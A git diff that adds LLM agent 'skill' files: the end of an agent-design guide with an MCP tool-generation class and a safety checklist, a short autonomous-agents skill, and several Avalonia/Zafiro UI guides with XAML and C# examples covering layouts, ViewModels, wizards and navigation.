|
||||
### 6.1 MCP Server Pattern
|
||||
|
||||
```python
|
||||
from mcp import Server, Tool
|
||||
|
||||
class MCPAgent:
|
||||
"""
|
||||
Agent that can dynamically discover and use MCP tools.
|
||||
'Add a tool that...' pattern from Cline.
|
||||
"""
|
||||
|
||||
def __init__(self, llm):
|
||||
self.llm = llm
|
||||
self.mcp_servers = {}
|
||||
self.available_tools = {}
|
||||
|
||||
def connect_server(self, name: str, config: dict) -> None:
|
||||
"""Connect to an MCP server"""
|
||||
server = Server(config)
|
||||
self.mcp_servers[name] = server
|
||||
|
||||
# Discover tools
|
||||
tools = server.list_tools()
|
||||
for tool in tools:
|
||||
self.available_tools[tool.name] = {
|
||||
"server": name,
|
||||
"schema": tool.schema
|
||||
}
|
||||
|
||||
async def create_tool(self, description: str) -> str:
|
||||
"""
|
||||
Create a new MCP server based on user description.
|
||||
'Add a tool that fetches Jira tickets'
|
||||
"""
|
||||
# Generate MCP server code
|
||||
code = self.llm.generate(f"""
|
||||
Create a Python MCP server with a tool that does:
|
||||
{description}
|
||||
|
||||
Use the FastMCP framework. Include proper error handling.
|
||||
Return only the Python code.
|
||||
""")
|
||||
|
||||
# Save and install
|
||||
server_name = self._extract_name(description)
|
||||
path = f"./mcp_servers/{server_name}/server.py"
|
||||
|
||||
with open(path, 'w') as f:
|
||||
f.write(code)
|
||||
|
||||
# Hot-reload
|
||||
self.connect_server(server_name, {"path": path})
|
||||
|
||||
return f"Created tool: {server_name}"
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Best Practices Checklist
|
||||
|
||||
### Agent Design
|
||||
|
||||
- [ ] Clear task decomposition
|
||||
- [ ] Appropriate tool granularity
|
||||
- [ ] Error handling at each step
|
||||
- [ ] Progress visibility to user
|
||||
|
||||
### Safety
|
||||
|
||||
- [ ] Permission system implemented
|
||||
- [ ] Dangerous operations blocked
|
||||
- [ ] Sandbox for untrusted code
|
||||
- [ ] Audit logging enabled
|
||||
|
||||
### UX
|
||||
|
||||
- [ ] Approval UI is clear
|
||||
- [ ] Progress updates provided
|
||||
- [ ] Undo/rollback available
|
||||
- [ ] Explanation of actions
|
||||
|
||||
---
|
||||
|
||||
## Resources
|
||||
|
||||
- [Cline](https://github.com/cline/cline)
|
||||
- [OpenAI Codex](https://github.com/openai/codex)
|
||||
- [Model Context Protocol](https://modelcontextprotocol.io/)
|
||||
- [Anthropic Tool Use](https://docs.anthropic.com/claude/docs/tool-use)
|
||||
73
packages/llm/skills/autonomous-agents/SKILL.md
Normal file
73
packages/llm/skills/autonomous-agents/SKILL.md
Normal file
@ -0,0 +1,73 @@
|
||||
---
|
||||
name: autonomous-agents
|
||||
description: "Autonomous agents are AI systems that can independently decompose goals, plan actions, execute tools, and self-correct without constant human guidance. The challenge isn't making them capable - it'..."
|
||||
risk: unknown
|
||||
source: "vibeship-spawner-skills (Apache 2.0)"
|
||||
date_added: "2026-02-27"
|
||||
---
|
||||
|
||||
# Autonomous Agents
|
||||
|
||||
You are an agent architect who has learned the hard lessons of autonomous AI.
|
||||
You've seen the gap between impressive demos and production disasters. You know
|
||||
that a 95% success rate per step means only 60% by step 10.
|
||||
|
||||
Your core insight: Autonomy is earned, not granted. Start with heavily
|
||||
constrained agents that do one thing reliably. Add autonomy only as you prove
|
||||
reliability. The best agents look less impressive but work consistently.
|
||||
|
||||
You push for guardrails before capabilities, logging befor
|
||||
|
||||
## Capabilities
|
||||
|
||||
- autonomous-agents
|
||||
- agent-loops
|
||||
- goal-decomposition
|
||||
- self-correction
|
||||
- reflection-patterns
|
||||
- react-pattern
|
||||
- plan-execute
|
||||
- agent-reliability
|
||||
- agent-guardrails
|
||||
|
||||
## Patterns
|
||||
|
||||
### ReAct Agent Loop
|
||||
|
||||
Alternating reasoning and action steps
|
||||
|
||||
### Plan-Execute Pattern
|
||||
|
||||
Separate planning phase from execution
|
||||
|
||||
### Reflection Pattern
|
||||
|
||||
Self-evaluation and iterative improvement
|
||||
|
||||
## Anti-Patterns
|
||||
|
||||
### ❌ Unbounded Autonomy
|
||||
|
||||
### ❌ Trusting Agent Outputs
|
||||
|
||||
### ❌ General-Purpose Autonomy
|
||||
|
||||
## ⚠️ Sharp Edges
|
||||
|
||||
| Issue | Severity | Solution |
|
||||
|-------|----------|----------|
|
||||
| Issue | critical | ## Reduce step count |
|
||||
| Issue | critical | ## Set hard cost limits |
|
||||
| Issue | critical | ## Test at scale before production |
|
||||
| Issue | high | ## Validate against ground truth |
|
||||
| Issue | high | ## Build robust API clients |
|
||||
| Issue | high | ## Least privilege principle |
|
||||
| Issue | medium | ## Track context usage |
|
||||
| Issue | medium | ## Structured logging |
|
||||
|
||||
## Related Skills
|
||||
|
||||
Works well with: `agent-tool-builder`, `agent-memory-systems`, `multi-agent-orchestration`, `agent-evaluation`
|
||||
|
||||
## When to Use
|
||||
This skill is applicable to execute the workflow or actions described in the overview.
|
||||
64
packages/llm/skills/avalonia-layout-zafiro/SKILL.md
Normal file
64
packages/llm/skills/avalonia-layout-zafiro/SKILL.md
Normal file
@ -0,0 +1,64 @@
|
||||
---
|
||||
name: avalonia-layout-zafiro
|
||||
description: "Guidelines for modern Avalonia UI layout using Zafiro.Avalonia, emphasizing shared styles, generic components, and avoiding XAML redundancy."
|
||||
risk: unknown
|
||||
source: community
|
||||
date_added: "2026-02-27"
|
||||
---
|
||||
|
||||
# Avalonia Layout with Zafiro.Avalonia
|
||||
|
||||
> Master modern, clean, and maintainable Avalonia UI layouts.
|
||||
> **Focus on semantic containers, shared styles, and minimal XAML.**
|
||||
|
||||
## 🎯 Selective Reading Rule
|
||||
|
||||
**Read ONLY files relevant to the layout challenge!**
|
||||
|
||||
---
|
||||
|
||||
## 📑 Content Map
|
||||
|
||||
| File | Description | When to Read |
|
||||
|------|-------------|--------------|
|
||||
| `themes.md` | Theme organization and shared styles | Setting up or refining app themes |
|
||||
| `containers.md` | Semantic containers (`HeaderedContainer`, `EdgePanel`, `Card`) | Structuring views and layouts |
|
||||
| `icons.md` | Icon usage with `IconExtension` and `IconOptions` | Adding and customizing icons |
|
||||
| `behaviors.md` | `Xaml.Interaction.Behaviors` and avoiding Converters | Implementing complex interactions |
|
||||
| `components.md` | Generic components and avoiding nesting | Creating reusable UI elements |
|
||||
|
||||
---
|
||||
|
||||
## 🔗 Related Project (Exemplary Implementation)
|
||||
|
||||
For a real-world example, refer to the **Angor** project:
|
||||
`/mnt/fast/Repos/angor/src/Angor/Avalonia/Angor.Avalonia.sln`
|
||||
|
||||
---
|
||||
|
||||
## ✅ Checklist for Clean Layouts
|
||||
|
||||
- [ ] **Used semantic containers?** (e.g., `HeaderedContainer` instead of `Border` with manual header)
|
||||
- [ ] **Avoided redundant properties?** Use shared styles in `axaml` files.
|
||||
- [ ] **Minimized nesting?** Flatten layouts using `EdgePanel` or generic components.
|
||||
- [ ] **Icons via extension?** Use `{Icon fa-name}` and `IconOptions` for styling.
|
||||
- [ ] **Behaviors over code-behind?** Use `Interaction.Behaviors` for UI-logic.
|
||||
- [ ] **Avoided Converters?** Prefer ViewModel properties or Behaviors unless necessary.
|
||||
|
||||
---
|
||||
|
||||
## ❌ Anti-Patterns
|
||||
|
||||
**DON'T:**
|
||||
- Use hardcoded colors or sizes (literals) in views.
|
||||
- Create deep nesting of `Grid` and `StackPanel`.
|
||||
- Repeat visual properties across multiple elements (use Styles).
|
||||
- Use `IValueConverter` for simple logic that belongs in the ViewModel.
|
||||
|
||||
**DO:**
|
||||
- Use `DynamicResource` for colors and brushes.
|
||||
- Extract repeated layouts into generic components.
|
||||
- Leverage `Zafiro.Avalonia` specific panels like `EdgePanel` for common UI patterns.
|
||||
|
||||
## When to Use
|
||||
This skill is applicable to execute the workflow or actions described in the overview.
|
||||
35
packages/llm/skills/avalonia-layout-zafiro/behaviors.md
Normal file
35
packages/llm/skills/avalonia-layout-zafiro/behaviors.md
Normal file
@ -0,0 +1,35 @@
|
||||
# Interactions and Logic
|
||||
|
||||
To keep XAML clean and maintainable, minimize logic in views and avoid excessive use of converters.
|
||||
|
||||
## 🎭 Xaml.Interaction.Behaviors
|
||||
|
||||
Use `Interaction.Behaviors` to handle UI-related logic that doesn't belong in the ViewModel, such as focus management, animations, or specialized event handling.
|
||||
|
||||
```xml
|
||||
<TextBox Text="{Binding Address}">
|
||||
<Interaction.Behaviors>
|
||||
<UntouchedClassBehavior />
|
||||
</Interaction.Behaviors>
|
||||
</TextBox>
|
||||
```
|
||||
|
||||
### Why use Behaviors?
|
||||
- **Encapsulation**: UI logic is contained in a reusable behavior class.
|
||||
- **Clean XAML**: Avoids code-behind and complex XAML triggers.
|
||||
- **Testability**: Behaviors can be tested independently of the View.
|
||||
|
||||
## 🚫 Avoiding Converters
|
||||
|
||||
Converters often lead to "magical" logic hidden in XAML. Whenever possible, prefer:
|
||||
|
||||
1. **ViewModel Properties**: Let the ViewModel provide the final data format (e.g., a `string` formatted for display).
|
||||
2. **MultiBinding**: Use for simple logic combinations (And/Or) directly in XAML.
|
||||
3. **Behaviors**: For more complex interactions that involve state or events.
|
||||
|
||||
### When to use Converters?
|
||||
Only use them when the conversion is purely visual and highly reusable across different contexts (e.g., `BoolToOpacityConverter`).
|
||||
|
||||
## 🧩 Simplified Interactions
|
||||
|
||||
If you find yourself needing a complex converter or behavior, consider if the component can be simplified or if the data model can be adjusted to make the view binding more direct.
|
||||
41
packages/llm/skills/avalonia-layout-zafiro/components.md
Normal file
41
packages/llm/skills/avalonia-layout-zafiro/components.md
Normal file
@ -0,0 +1,41 @@
|
||||
# Building Generic Components
|
||||
|
||||
Reducing nesting and complexity is achieved by breaking down views into generic, reusable components.
|
||||
|
||||
## 🧊 Generic Components
|
||||
|
||||
Instead of building large, complex views, extract recurring patterns into small `UserControl`s.
|
||||
|
||||
### Example: A generic "Summary Item"
|
||||
Instead of repeating a `Grid` with labels and values:
|
||||
|
||||
```xml
|
||||
<!-- ❌ BAD: Repeated Grid -->
|
||||
<Grid ColumnDefinitions="*,Auto">
|
||||
<TextBlock Text="Total:" />
|
||||
<TextBlock Grid.Column="1" Text="{Binding Total}" />
|
||||
</Grid>
|
||||
```
|
||||
|
||||
Create a generic component (or use `EdgePanel` with a Style):
|
||||
|
||||
```xml
|
||||
<!-- ✅ GOOD: Use a specialized control or style -->
|
||||
<EdgePanel StartContent="Total:" EndContent="{Binding Total}" Classes="SummaryItem" />
|
||||
```
|
||||
|
||||
## 📉 Flattening Layouts
|
||||
|
||||
Avoid deep nesting. Deeply nested XAML is hard to read and can impact performance.
|
||||
|
||||
- **StackPanel vs Grid**: Use `StackPanel` (with `Spacing`) for simple linear layouts.
|
||||
- **EdgePanel**: Great for "Label - Value" or "Icon - Text - Action" rows.
|
||||
- **UniformGrid**: Use for grids where all cells are the same size.
|
||||
|
||||
## 🔧 Component Granularity
|
||||
|
||||
- **Atomical**: Small controls like custom buttons or icons.
|
||||
- **Molecular**: Groups of atoms like a `HeaderedContainer` with specific content.
|
||||
- **Organisms**: Higher-level sections of a page.
|
||||
|
||||
Aim for components that are generic enough to be reused but specific enough to simplify the parent view significantly.
|
||||
50
packages/llm/skills/avalonia-layout-zafiro/containers.md
Normal file
50
packages/llm/skills/avalonia-layout-zafiro/containers.md
Normal file
@ -0,0 +1,50 @@
|
||||
# Semantic Containers
|
||||
|
||||
Using the right container for the data type simplifies XAML and improves maintainability. `Zafiro.Avalonia` provides specialized controls for common layout patterns.
|
||||
|
||||
## 📦 HeaderedContainer
|
||||
|
||||
Prefer `HeaderedContainer` over a `Border` or `Grid` when a section needs a title or header.
|
||||
|
||||
```xml
|
||||
<HeaderedContainer Header="Security Settings" Classes="WizardSection">
|
||||
<StackPanel>
|
||||
<!-- Content here -->
|
||||
</StackPanel>
|
||||
</HeaderedContainer>
|
||||
```
|
||||
|
||||
### Key Properties:
|
||||
- `Header`: The content or string for the header.
|
||||
- `HeaderBackground`: Brush for the header area.
|
||||
- `ContentPadding`: Padding for the content area.
|
||||
|
||||
## ↔️ EdgePanel
|
||||
|
||||
Use `EdgePanel` to position elements at the edges of a container without complex `Grid` definitions.
|
||||
|
||||
```xml
|
||||
<EdgePanel StartContent="{Icon fa-wallet}"
|
||||
Content="Wallet Balance"
|
||||
EndContent="$1,234.00" />
|
||||
```
|
||||
|
||||
### Slots:
|
||||
- `StartContent`: Aligned to the left (or beginning).
|
||||
- `Content`: Fills the remaining space in the middle.
|
||||
- `EndContent`: Aligned to the right (or end).
|
||||
|
||||
## 📇 Card
|
||||
|
||||
A simple container for grouping related information, often used inside `HeaderedContainer` or as a standalone element in a list.
|
||||
|
||||
```xml
|
||||
<Card Header="Enter recipient address:">
|
||||
<TextBox Text="{Binding Address}" />
|
||||
</Card>
|
||||
```
|
||||
|
||||
## 📐 Best Practices
|
||||
|
||||
- Use `Classes` to apply themed variants (e.g., `Classes="Section"`, `Classes="Highlight"`).
|
||||
- Customize internal parts of the containers using templates in your styles when necessary, rather than nesting more controls.
|
||||
53
packages/llm/skills/avalonia-layout-zafiro/icons.md
Normal file
53
packages/llm/skills/avalonia-layout-zafiro/icons.md
Normal file
@ -0,0 +1,53 @@
|
||||
# Icon Usage
|
||||
|
||||
`Zafiro.Avalonia` simplifies icon management using a specialized markup extension and styling options.
|
||||
|
||||
## 🛠️ IconExtension
|
||||
|
||||
Use the `{Icon}` markup extension to easily include icons from libraries like FontAwesome.
|
||||
|
||||
```xml
|
||||
<!-- Positional parameter -->
|
||||
<Button Content="{Icon fa-wallet}" />
|
||||
|
||||
<!-- Named parameter -->
|
||||
<ContentControl Content="{Icon Source=fa-gear}" />
|
||||
```
|
||||
|
||||
## 🎨 IconOptions
|
||||
|
||||
`IconOptions` allows you to customize icons without manually wrapping them in other controls. It's often used in styles to provide a consistent look.
|
||||
|
||||
```xml
|
||||
<Style Selector="HeaderedContainer /template/ ContentPresenter#Header EdgePanel /template/ ContentControl#StartContent">
|
||||
<Setter Property="IconOptions.Size" Value="20" />
|
||||
<Setter Property="IconOptions.Fill" Value="{DynamicResource Accent}" />
|
||||
<Setter Property="IconOptions.Padding" Value="10" />
|
||||
<Setter Property="IconOptions.CornerRadius" Value="10" />
|
||||
</Style>
|
||||
```
|
||||
|
||||
### Common Properties:
|
||||
- `IconOptions.Size`: Sets the width and height of the icon.
|
||||
- `IconOptions.Fill`: The color/brush of the icon.
|
||||
- `IconOptions.Background`: Background brush for the icon container.
|
||||
- `IconOptions.Padding`: Padding inside the icon container.
|
||||
- `IconOptions.CornerRadius`: Corner radius if a background is used.
|
||||
|
||||
## 📁 Shared Icon Resources
|
||||
|
||||
Define icons as resources for reuse across the application.
|
||||
|
||||
```xml
|
||||
<ResourceDictionary xmlns="https://github.com/avaloniaui">
|
||||
<Icon x:Key="fa-wallet" Source="fa-wallet" />
|
||||
</ResourceDictionary>
|
||||
```
|
||||
|
||||
Then use them with `StaticResource` if they are already defined:
|
||||
|
||||
```xml
|
||||
<Button Content="{StaticResource fa-wallet}" />
|
||||
```
|
||||
|
||||
However, the `{Icon ...}` extension is usually preferred for its brevity and ability to create new icon instances on the fly.
|
||||
51
packages/llm/skills/avalonia-layout-zafiro/themes.md
Normal file
51
packages/llm/skills/avalonia-layout-zafiro/themes.md
Normal file
@ -0,0 +1,51 @@
|
||||
# Theme Organization and Shared Styles
|
||||
|
||||
Efficient theme organization is key to avoiding redundant XAML and ensuring visual consistency.
|
||||
|
||||
## 🏗️ Structure
|
||||
|
||||
Follow the pattern from Angor:
|
||||
|
||||
1. **Colors & Brushes**: Define in a dedicated `Colors.axaml`. Use `DynamicResource` to support theme switching.
|
||||
2. **Styles**: Group styles by category (e.g., `Buttons.axaml`, `Containers.axaml`, `Typography.axaml`).
|
||||
3. **App-wide Theme**: Aggregate all styles in a main `Theme.axaml`.
|
||||
|
||||
## 🎨 Avoiding Redundancy
|
||||
|
||||
Instead of setting properties directly on elements:
|
||||
|
||||
```xml
|
||||
<!-- ❌ BAD: Redundant properties -->
|
||||
<HeaderedContainer CornerRadius="10" BorderThickness="1" BorderBrush="Blue" Background="LightBlue" />
|
||||
<HeaderedContainer CornerRadius="10" BorderThickness="1" BorderBrush="Blue" Background="LightBlue" />
|
||||
|
||||
<!-- ✅ GOOD: Use Classes and Styles -->
|
||||
<HeaderedContainer Classes="BlueSection" />
|
||||
<HeaderedContainer Classes="BlueSection" />
|
||||
```
|
||||
|
||||
Define the style in a shared `axaml` file:
|
||||
|
||||
```xml
|
||||
<Style Selector="HeaderedContainer.BlueSection">
|
||||
<Setter Property="CornerRadius" Value="10" />
|
||||
<Setter Property="BorderThickness" Value="1" />
|
||||
<Setter Property="BorderBrush" Value="{DynamicResource Accent}" />
|
||||
<Setter Property="Background" Value="{DynamicResource SurfaceSubtle}" />
|
||||
</Style>
|
||||
```
|
||||
|
||||
## 🧩 Shared Icons and Resources
|
||||
|
||||
Centralize icon definitions and other shared resources in `Icons.axaml` and include them in the `MergedDictionaries` of your theme or `App.axaml`.
|
||||
|
||||
```xml
|
||||
<Application.Resources>
|
||||
<ResourceDictionary>
|
||||
<ResourceDictionary.MergedDictionaries>
|
||||
<MergeResourceInclude Source="UI/Themes/Styles/Containers.axaml" />
|
||||
<MergeResourceInclude Source="UI/Shared/Resources/Icons.axaml" />
|
||||
</ResourceDictionary.MergedDictionaries>
|
||||
</ResourceDictionary>
|
||||
</Application.Resources>
|
||||
```
|
||||
35
packages/llm/skills/avalonia-viewmodels-zafiro/SKILL.md
Normal file
35
packages/llm/skills/avalonia-viewmodels-zafiro/SKILL.md
Normal file
@ -0,0 +1,35 @@
|
||||
---
|
||||
name: avalonia-viewmodels-zafiro
|
||||
description: "Optimal ViewModel and Wizard creation patterns for Avalonia using Zafiro and ReactiveUI."
|
||||
risk: unknown
|
||||
source: community
|
||||
date_added: "2026-02-27"
|
||||
---
|
||||
|
||||
# Avalonia ViewModels with Zafiro
|
||||
|
||||
This skill provides a set of best practices and patterns for creating ViewModels, Wizards, and managing navigation in Avalonia applications, leveraging the power of **ReactiveUI** and the **Zafiro** toolkit.
|
||||
|
||||
## Core Principles
|
||||
|
||||
1. **Functional-Reactive Approach**: Use ReactiveUI (`ReactiveObject`, `WhenAnyValue`, etc.) to handle state and logic.
|
||||
2. **Enhanced Commands**: Utilize `IEnhancedCommand` for better command management, including progress reporting and name/text attributes.
|
||||
3. **Wizard Pattern**: Implement complex flows using `SlimWizard` and `WizardBuilder` for a declarative and maintainable approach.
|
||||
4. **Automatic Section Discovery**: Use the `[Section]` attribute to register and discover UI sections automatically.
|
||||
5. **Clean Composition**: map ViewModels to Views using `DataTypeViewLocator` and manage dependencies in the `CompositionRoot`.
|
||||
|
||||
## Guides
|
||||
|
||||
- [ViewModels & Commands](viewmodels.md): Creating robust ViewModels and handling commands.
|
||||
- [Wizards & Flows](wizards.md): Building multi-step wizards with `SlimWizard`.
|
||||
- [Navigation & Sections](navigation_sections.md): Managing navigation and section-based UIs.
|
||||
- [Composition & Mapping](composition.md): Best practices for View-ViewModel wiring and DI.
|
||||
|
||||
## Example Reference
|
||||
|
||||
For real-world implementations, refer to the **Angor** project:
|
||||
- `CreateProjectFlowV2.cs`: Excellent example of complex Wizard building.
|
||||
- `HomeViewModel.cs`: Simple section ViewModel using functional-reactive commands.
|
||||
|
||||
## When to Use
|
||||
This skill is applicable to execute the workflow or actions described in the overview.
|
||||
@ -0,0 +1,75 @@
|
||||
# Composition & Mapping
|
||||
|
||||
Ensuring your ViewModels are correctly instantiated and mapped to their corresponding Views is crucial for a maintainable application.
|
||||
|
||||
## ViewModel-to-View Mapping
|
||||
|
||||
Zafiro uses the `DataTypeViewLocator` to automatically map ViewModels to Views based on their data type.
|
||||
|
||||
### Integration in App.axaml
|
||||
|
||||
Register the `DataTypeViewLocator` in your application's data templates:
|
||||
|
||||
```xml
|
||||
<Application.DataTemplates>
|
||||
<DataTypeViewLocator />
|
||||
<DataTemplateInclude Source="avares://Zafiro.Avalonia/DataTemplates.axaml" />
|
||||
</Application.DataTemplates>
|
||||
```
|
||||
|
||||
### Registration
|
||||
|
||||
Mappings can be registered globally or locally. Common practice in Zafiro projects is to use naming conventions or explicit registrations made by source generators.
|
||||
|
||||
## Composition Root
|
||||
|
||||
Use a central `CompositionRoot` to manage dependency injection and service registration.
|
||||
|
||||
```csharp
|
||||
public static class CompositionRoot
|
||||
{
|
||||
public static IShellViewModel CreateMainViewModel(Control topLevelView)
|
||||
{
|
||||
var services = new ServiceCollection();
|
||||
|
||||
services
|
||||
.AddViewModels()
|
||||
.AddUIServices(topLevelView);
|
||||
|
||||
var serviceProvider = services.BuildServiceProvider();
|
||||
return serviceProvider.GetRequiredService<IShellViewModel>();
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
### Registering ViewModels
|
||||
|
||||
Register ViewModels with appropriate scopes (Transient, Scoped, or Singleton).
|
||||
|
||||
```csharp
|
||||
public static IServiceCollection AddViewModels(this IServiceCollection services)
|
||||
{
|
||||
return services
|
||||
.AddTransient<IHomeSectionViewModel, HomeSectionSectionViewModel>()
|
||||
.AddSingleton<IShellViewModel, ShellViewModel>();
|
||||
}
|
||||
```
|
||||
|
||||
## View Injection
|
||||
|
||||
Use the `Connect` helper (if available) or manual instantiation in `OnFrameworkInitializationCompleted`:
|
||||
|
||||
```csharp
|
||||
public override void OnFrameworkInitializationCompleted()
|
||||
{
|
||||
this.Connect(
|
||||
() => new ShellView(),
|
||||
view => CompositionRoot.CreateMainViewModel(view),
|
||||
() => new MainWindow());
|
||||
|
||||
base.OnFrameworkInitializationCompleted();
|
||||
}
|
||||
```
|
||||
|
||||
> [!TIP]
|
||||
> Use `ActivatorUtilities.CreateInstance` when you need to manually instantiate a class while still resolving its dependencies from the `IServiceProvider`.
|
||||
@ -0,0 +1,53 @@
|
||||
# Navigation & Sections
|
||||
|
||||
Zafiro provides powerful abstractions for managing application-wide navigation and modular UI sections.
|
||||
|
||||
## Navigation with INavigator
|
||||
|
||||
The `INavigator` interface is used to switch between different views or viewmodels.
|
||||
|
||||
```csharp
|
||||
public class MyViewModel(INavigator navigator)
|
||||
{
|
||||
public async Task GoToDetails()
|
||||
{
|
||||
await navigator.Navigate(() => new DetailsViewModel());
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
## UI Sections
|
||||
|
||||
Sections are modular parts of the UI (like tabs or sidebar items) that can be automatically registered.
|
||||
|
||||
### The [Section] Attribute
|
||||
|
||||
ViewModels intended to be sections should be marked with the `[Section]` attribute.
|
||||
|
||||
```csharp
|
||||
[Section("Wallet", icon: "fa-wallet")]
|
||||
public class WalletSectionViewModel : IWalletSectionViewModel
|
||||
{
|
||||
// ...
|
||||
}
|
||||
```
|
||||
|
||||
### Automatic Registration
|
||||
|
||||
In the `CompositionRoot`, sections can be automatically registered:
|
||||
|
||||
```csharp
|
||||
services.AddAnnotatedSections(logger);
|
||||
services.AddSectionsFromAttributes(logger);
|
||||
```
|
||||
|
||||
### Switching Sections
|
||||
|
||||
You can switch the current active section via the `IShellViewModel`:
|
||||
|
||||
```csharp
|
||||
shellViewModel.SetSection("Browse");
|
||||
```
|
||||
|
||||
> [!IMPORTANT]
|
||||
> The `icon` parameter in the `[Section]` attribute supports FontAwesome icons (e.g., `fa-home`) when configured with `ProjektankerIconControlProvider`.
|
||||
68
packages/llm/skills/avalonia-viewmodels-zafiro/viewmodels.md
Normal file
68
packages/llm/skills/avalonia-viewmodels-zafiro/viewmodels.md
Normal file
@ -0,0 +1,68 @@
|
||||
# ViewModels & Commands
|
||||
|
||||
In a Zafiro-based application, ViewModels should be functional, reactive, and resilient.
|
||||
|
||||
## Reactive ViewModels
|
||||
|
||||
Use `ReactiveObject` as the base class. Properties should be defined using the `[Reactive]` attribute (from ReactiveUI.SourceGenerators) for brevity.
|
||||
|
||||
```csharp
|
||||
public partial class MyViewModel : ReactiveObject
|
||||
{
|
||||
[Reactive] private string name;
|
||||
[Reactive] private bool isBusy;
|
||||
}
|
||||
```
|
||||
|
||||
### Observation and Transformation
|
||||
|
||||
Use `WhenAnyValue` to react to property changes:
|
||||
|
||||
```csharp
|
||||
this.WhenAnyValue(x => x.Name)
|
||||
.Select(name => !string.IsNullOrEmpty(name))
|
||||
.ToPropertyEx(this, x => x.CanSubmit);
|
||||
```
|
||||
|
||||
## Enhanced Commands
|
||||
|
||||
Zafiro uses `IEnhancedCommand`, which extends `ICommand` and `IReactiveCommand` with additional metadata like `Name` and `Text`.
|
||||
|
||||
### Creating a Command
|
||||
|
||||
Use `ReactiveCommand.Create` or `ReactiveCommand.CreateFromTask` and then `Enhance()` it.
|
||||
|
||||
```csharp
|
||||
public IEnhancedCommand Submit { get; }
|
||||
|
||||
public MyViewModel()
|
||||
{
|
||||
Submit = ReactiveCommand.CreateFromTask(OnSubmit, canSubmit)
|
||||
.Enhance(text: "Submit Data", name: "SubmitCommand");
|
||||
}
|
||||
```
|
||||
|
||||
### Error Handling
|
||||
|
||||
Use `HandleErrorsWith` to automatically channel command errors to the `NotificationService`.
|
||||
|
||||
```csharp
|
||||
Submit.HandleErrorsWith(uiServices.NotificationService, "Submission Failed")
|
||||
.DisposeWith(disposable);
|
||||
```
|
||||
|
||||
## Disposables
|
||||
|
||||
Always use a `CompositeDisposable` to manage subscriptions and command lifetimes.
|
||||
|
||||
```csharp
|
||||
public class MyViewModel : ReactiveObject, IDisposable
|
||||
{
|
||||
private readonly CompositeDisposable disposables = new();
|
||||
|
||||
public void Dispose() => disposables.Dispose();
|
||||
}
|
||||
```
|
||||
|
||||
> [!TIP]
|
||||
> Use `.DisposeWith(disposables)` on any observable subscription or command to ensure proper cleanup.
|
||||
47
packages/llm/skills/avalonia-viewmodels-zafiro/wizards.md
Normal file
47
packages/llm/skills/avalonia-viewmodels-zafiro/wizards.md
Normal file
@ -0,0 +1,47 @@
|
||||
# Wizards & Flows
|
||||
|
||||
Complex multi-step processes are handled using the `SlimWizard` pattern. This provides a declarative way to define steps, navigation logic, and final results.
|
||||
|
||||
## Defining a Wizard
|
||||
|
||||
Use `WizardBuilder` to define the steps. Each step corresponds to a ViewModel.
|
||||
|
||||
```csharp
|
||||
SlimWizard<string> wizard = WizardBuilder
|
||||
.StartWith(() => new Step1ViewModel(data))
|
||||
.NextUnit()
|
||||
.WhenValid()
|
||||
.Then(prevResult => new Step2ViewModel(prevResult))
|
||||
.NextCommand(vm => vm.CustomNextCommand)
|
||||
.Then(result => new SuccessViewModel("Done!"))
|
||||
.Next((_, s) => s, "Finish")
|
||||
.WithCompletionFinalStep();
|
||||
```
|
||||
|
||||
### Navigation Rules
|
||||
|
||||
- **NextUnit()**: Advances when a simple signal is emitted.
|
||||
- **NextCommand()**: Advances when a specific command in the ViewModel execution successfully.
|
||||
- **WhenValid()**: Wait until the current ViewModel's validation passes before allowing navigation.
|
||||
- **Always()**: Navigation is always allowed.
|
||||
|
||||
## Navigation Integration
|
||||
|
||||
The wizard is navigated using an `INavigator`:
|
||||
|
||||
```csharp
|
||||
public async Task CreateSomething()
|
||||
{
|
||||
var wizard = BuildWizard();
|
||||
var result = await wizard.Navigate(navigator);
|
||||
// Handle result
|
||||
}
|
||||
```
|
||||
|
||||
## Step Configuration
|
||||
|
||||
- **WithCompletionFinalStep()**: Marks the wizard as finished when the last step completes.
|
||||
- **WithCommitFinalStep()**: Typically used for wizards that perform a final "Save" or "Deploy" action.
|
||||
|
||||
> [!NOTE]
|
||||
> The `SlimWizard` handles the "Back" command automatically, providing a consistent user experience across different flows.
|
||||
35
packages/llm/skills/avalonia-zafiro-development/SKILL.md
Normal file
35
packages/llm/skills/avalonia-zafiro-development/SKILL.md
Normal file
@ -0,0 +1,35 @@
|
||||
---
|
||||
name: avalonia-zafiro-development
|
||||
description: "Mandatory skills, conventions, and behavioral rules for Avalonia UI development using the Zafiro toolkit."
|
||||
risk: unknown
|
||||
source: community
|
||||
date_added: "2026-02-27"
|
||||
---
|
||||
|
||||
# Avalonia Zafiro Development
|
||||
|
||||
This skill defines the mandatory conventions and behavioral rules for developing cross-platform applications with Avalonia UI and the Zafiro toolkit. These rules prioritize maintainability, correctness, and a functional-reactive approach.
|
||||
|
||||
## Core Pillars
|
||||
|
||||
1. **Functional-Reactive MVVM**: Pure MVVM logic using DynamicData and ReactiveUI.
|
||||
2. **Safety & Predictability**: Explicit error handling with `Result` types and avoidance of exceptions for flow control.
|
||||
3. **Cross-Platform Excellence**: Strictly Avalonia-independent ViewModels and composition-over-inheritance.
|
||||
4. **Zafiro First**: Leverage existing Zafiro abstractions and helpers to avoid redundancy.
|
||||
|
||||
## Guides
|
||||
|
||||
- [Core Technical Skills & Architecture](core-technical-skills.md): Fundamental skills and architectural principles.
|
||||
- [Naming & Coding Standards](naming-standards.md): Rules for naming, fields, and error handling.
|
||||
- [Avalonia, Zafiro & Reactive Rules](avalonia-reactive-rules.md): Specific guidelines for UI, Zafiro integration, and DynamicData pipelines.
|
||||
- [Zafiro Shortcuts](zafiro-shortcuts.md): Concise mappings for common Rx/Zafiro operations.
|
||||
- [Common Patterns](patterns.md): Advanced patterns like `RefreshableCollection` and Validation.
|
||||
|
||||
## Procedure Before Writing Code
|
||||
|
||||
1. **Search First**: Search the codebase for similar implementations or existing Zafiro helpers.
|
||||
2. **Reusable Extensions**: If a helper is missing, propose a new reusable extension method instead of inlining complex logic.
|
||||
3. **Reactive Pipelines**: Ensure DynamicData operators are used instead of plain Rx where applicable.
|
||||
|
||||
## When to Use
|
||||
This skill is applicable to execute the workflow or actions described in the overview.
|
||||
@ -0,0 +1,49 @@
|
||||
# Avalonia, Zafiro & Reactive Rules
|
||||
|
||||
## Avalonia UI Rules
|
||||
|
||||
- **Strict Avalonia**: Never use `System.Drawing`; always use Avalonia types.
|
||||
